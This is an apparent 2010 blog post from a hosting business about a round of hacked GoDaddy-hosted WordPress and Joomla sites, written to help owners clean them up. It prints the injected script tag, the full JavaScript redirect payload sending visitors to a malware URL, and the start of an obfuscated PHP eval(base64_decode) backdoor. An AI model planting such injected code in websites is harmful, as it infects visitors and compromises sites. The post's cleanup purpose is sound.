Another round of Godaddy sites hacked

By admin On May 4, 2010 · 1 Comment

Just a couple of days ago, another round of attacks to many sites hosted at GoDaddy had been performed.  The majority of the infections were mainly Joomla and WordPress based sites.  I actually own one site that had been compromised and thankfully it doesn’t get much traffic as it had been launched not too long ago.

Either way, I did dig into the files and found the javascripts that were injected into many of the pages / posts on the site.  Here’s what it looks like:

< script src=”http://kdjkfjskdfjlskdjf.com/kp.php”>

Further investigation of the file revealed this source code (this is the kp.php file by the way)

function setCookie(c_name,value,expiredays)
{
var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ “=” +escape(value)+ ((expiredays==null) ? “” :
“;expires=”+exdate.toGMTString()); } function getCookie(c_name){
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + “=”);
if (c_start!=-1) { c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(“;”,c_start);
if (c_end==-1) c_end=document.cookie.length; return
unescape(document.cookie.substring(c_start,c_end)); } } return “”; } var
name=getCookie(“pma_visited_theme1″); if (name==”"){ setCookie(“pma_visited_theme1″,”1″,20);
var
url=”http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D”; window.top.location.replace(url);
}else{ }

The text in bold above is the source for the malware that’s actually called in to infect the user’s PC / browser

Resolution? Easy, open up your index files and look for the following code:

< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ2..

Also, for the unlucky ones using WordPress, your themes folder houses all of your PHP files.  Go through them one by one and clean them up.

Just an FYI, I came across a tweet from Godaddy confirming the hack but they did not indicate how many sites were actually attacked / infected.

For help with such infections, or for solid, cheap and reliable hosting don’t hesitate to contact us for additional information.  We also provide SOLID and Black Hat free SEO services.

Tagged with:
 
If you enjoyed this article, please consider sharing it!
Reddit Facebook Twitter Delicious

One Response to Another round of Godaddy sites hacked

  1. CrazyT says:
    June 11, 2010 at 5:35 am

    great info! just what i needed to get my hosting account back in shape. even godaddy tech support didn’t have this information.

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Spam protection by WP Captcha-Free

Looking for something?

Use the form below to search the site:


Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Visit our friends!

A few highly recommended friends...

Archives

All entries, chronologically...